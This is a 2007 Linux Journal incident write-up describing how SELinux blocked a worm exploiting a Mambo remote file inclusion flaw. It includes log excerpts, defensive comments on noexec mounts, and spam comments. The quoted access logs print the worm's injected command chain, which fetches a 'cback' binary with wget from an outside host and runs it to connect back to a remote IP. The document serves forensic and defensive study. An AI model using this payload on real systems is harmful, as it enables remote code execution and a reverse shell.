Home

Mambo Exploit Blocked by SELinux

Issue 159

From Issue #159
July 2007

Jul 01, 2007  By Richard Bulling...
 in
A real-world case where SELinux proved its worth.

Listing 2. Attack Traces in Web Server Access Log

# grep 10.9.233.25 /root/exploit.log
/var/log/httpd/access_log:10.9.233.25 - - 
[04/May/2006:07:52:21 -0400]
"GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php
↪?_REQUEST[option]=com_content&_REQUEST[Itemid]
↪=1&GLOBALS=&mosConfig_absolute_path=
↪http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;
↪wget%20172.16.31.57/cback;chmod%20744%20cback;
↪./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1" 200 594 "-" "Mozilla/4.0 (compatible; MSIE 6.0; 
Windows NT 5.1;)"
/var/log/httpd/access_log:10.9.233.25 - - 
[04/May/2006:07:52:24 -0400]
"GET
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
↪[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
↪http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;
↪wget%20172.16.31.57/cback;chmod%20744%20cback;
↪./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; 
Windows NT 5.1;)"
/var/log/httpd/access_log:10.9.233.25 - - 
[04/May/2006:07:52:25 -0400]
"GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST
↪[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
↪http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;
↪wget%20172.16.31.57/cback;chmod%20744%20cback;
↪./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; 
Windows NT 5.1;)"
/var/log/httpd/access_log:10.9.233.25 - - 
[04/May/2006:07:52:27 -0400]
"POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1;)"

The log file did contain two very useful clues; it confirmed that the cback binary was related to a request made to Mambo. Furthermore, the query string confirmed that the attacker used wget, a command-line URL-fetching tool, to retrieve the exploit from a remote server. The Web server request attempted to execute the cback executable with an IP address parameter of 10.200.238.39, presumably another machine under the control of the attacker.

The attack attempted to execute this sequence of shell commands: 

cd /tmp
wget 172.16.31.57/cback
chmod 744 cback
./cback 10.200.238.39 8080
echo YYY
echo| HTTP/1.1

Going back to /var/log/messages, I searched for further suspicious SELinux enforcement messages. Listing 3 contains the lines that matched the times of the Web server attacks.

Listing 3. SELinux Audit Messages

May  4 07:52:24 targetbox kernel: 
audit(1146743544.910:2275): avc:
denied  { ioctl } for  pid=9399 comm="wget" 
name="error_log" dev=dm-0
ino=1624085 scontext=user_u:system_r:httpd_sys_script_t
tcontext=root:object_r:httpd_log_t tclass=file 
May  4 07:52:24 targetbox
kernel: audit(1146743544.911:2276): 
avc:  denied  { ioctl } for  pid=9399
comm="wget" name="error_log" dev=dm-0 ino=1624085 
scontext=user_u:system_r:httpd_sys_script_t 
tcontext=root:object_r:httpd_log_t
tclass=file
May  4 07:52:27 targetbox kernel: audit(1146743547.060:2277): 
avc: denied  { execute_no_trans } for  pid=9401 comm="sh" 
name="cback" dev=dm-0 ino=852100 
scontext=user_u:system_r:httpd_sys_script_t
tcontext=user_u:object_r:httpd_sys_script_rw
_t tclass=file

This appeared to be a worm, because www.pkrinternet.com (on a different machine, but the same subnet) also had requests from 10.9.233.25 at around the same time, as Listing 4 shows.

Listing 4. Verification of Worm Activity on Nearby Server

$ grep 10.9.233.25 \
/var/log/httpd/www.pkrinternet.com-access_log
10.9.233.25 - - [04/May/2006:07:52:21 -0400] 
"GET
/index2.php?option=com_content&do_pdf=1&id=
↪1index2.php?_REQUEST[option]=com_content&_REQUEST
↪[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
↪http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;
↪wget%20172.16.31.57/cback;chmod%20744%20cback;
↪./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; 
Windows NT 5.1;)"
10.9.233.25 - - [04/May/2006:07:52:21 -0400] 
"GET
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST
↪[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
↪&mosConfig_absolute_path=
↪http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;
↪wget%20172.16.31.57/cback;chmod%20744%20cback;
↪./cback%2010.200.238.39%208080;echo%20YYY;echo|
HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; 
Windows NT 5.1;)"
[ ...output trimmed ]

Lines showing further attacks similar to the trace on stockpot versus Mambo, xmlrpc.php, drupal and phpgroupware also appeared in this grep.

The worm made requests only to the default virtual host, so it's likely that the worm was not using the Host: virtual host header in its requests. This indicates that it was scanning IP subnets for vulnerable hosts, rather than working through a list of hostnames.

The modification time on the cback file was Feb 5, 2005. That was probably the modification time of the file on the remote system that wget retrieved. wget normally resets the modification time of files it downloads to match their original modification times. Listing 5 shows how to interrogate all the timestamps on a file.

______________________

Comments

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.

Titanic movie rendered with Linux

bosch servisi's picture
Submitted by bosch servisi (not verified) on Sat, 09/18/2010 - 10:19.

bosch servisi, bosch servis

..

turkce's picture
Submitted by turkce (not verified) on Sat, 12/27/2008 - 12:18.

Thanks..

radyo

radyo's picture
Submitted by radyo (not verified) on Wed, 10/29/2008 - 14:34.

thank you very good

An alternate defense against this attack

Richard Bullington-McGuire's picture
Submitted by Richard Bulling... on Mon, 06/25/2007 - 10:41.

Kyle Wilson recently wrote me regarding this article, and gave me permission to share his remarks with Linux Journal readers:
________________________________________________________

Richard,

Hi. I just finished reading your article about SELinux in this month's Linux Journal. I enjoyed it very much. I thought I'd share a tip with you which I use to protect my internet facing servers. I always edit my fstab file to include the nosuid and noexec mount options for my tmp file system. In the case of the Mambo exploit which you wrote about, having the noexec mount option on /tmp would have also prevented the exploit by preventing the execution of the cback binary which was placed in your /tmp file system. Here's the description of the options from the mount man page:

noexec - Do not allow execution of any binaries on the mounted file system. This option might be useful for a server that has file systems containing binaries for architectures other than its own.

nosuid - Do not allow set-user-identifier or set-group-identifier bits to take effect. (This seems safe, but is in fact rather unsafe if you have suidperl(1) installed.)

Kyle
________________________________________________________

Kyle has some good points about protecting filesystems using mount options. That is a solid and time-honored way of helping to secure a system, to be sure. I've seen some systems that have many filesystem mount points that are locked down with noexec and nosuid options.

Many systems today (including the one I wrote about) only have two file systems by default, that is a boot and / filesystems. This system was one of those. Locking down /tmp like that would also have protected from this specific attack, had SELinux not been activated:


# for /etc/fstab:
none /tmp tmpfs nosuid,noexec,rw,size=512m 0 0

However, other points of vulnerability also exist, such as /dev/shm, /var/tmp, and really, any writable file on your system. To be thorough about using nosuid and noexec options, you would need to ensure that these directories are also protected with these options. That is easy enough for /dev/shm, but not so easy for /var/tmp unless you dedicate a disk partition to it, or do funny tricks such as mounting a file on /var with the loop device and mounting that on /var/tmp. Even doing that is not proof against a determined attacker, as this shell code snippet illustrates:


# Try this out on your system to see how wide-open you could still be
echo "World-writable directories:"
find / -type d -perm +0002
echo "World-witable files:"
find / -type f -perm +0002

One of the nice things about the Red Hat / Fedora SELinux targeted policies is that it stops attacks on pretty much all of these locations with a default-deny rule.

Correction: sentence below Listing 4

Richard Bullington-McGuire's picture
Submitted by Richard Bulling... on Mon, 06/25/2007 - 10:26.

The sentence below Listing 4 should read:

Lines showing further attacks similar to the trace on targetbox versus Mambo, xmlrpc.php, drupal and phpgroupware also appeared in this grep.

Webcast
More Resources
How to Build an Optimal Hadoop Cluster to Store and Maintain Unlimited Amounts of Data Using Microservers

Realizing the promise of Apache® Hadoop® requires the effective deployment of compute, memory, storage and networking to achieve optimal results. With its flexibility and multitude of options, it is easy to over or under provision the server infrastructure, resulting in poor performance and high TCO. Join us for an in depth, technical discussion with industry experts from leading Hadoop and server companies who will provide insights into the key considerations for designing and deploying an optimal Hadoop cluster.

Learn More

Sponsored by AMD

White Paper
More Resources
Red Hat White Paper: Using an Open Source Framework to Catch the Bad Guy

Built-in forensics, incident response, and security with Red Hat Enterprise Linux 6

Every security policy provides guidance and requirements for ensuring adequate protection of information and data, as well as high-level technical and administrative security requirements for a system in a given environment. Traditionally, providing security for a system focuses on the confidentiality of the information on it. However, protecting the data integrity and system and data availability is just as important. For example, when processing United States intelligence information, there are three attributes that require protection: confidentiality, integrity, and availability.

Learn more about catching the bad guy in this free white paper.

Learn More

Sponsored by DLT Solutions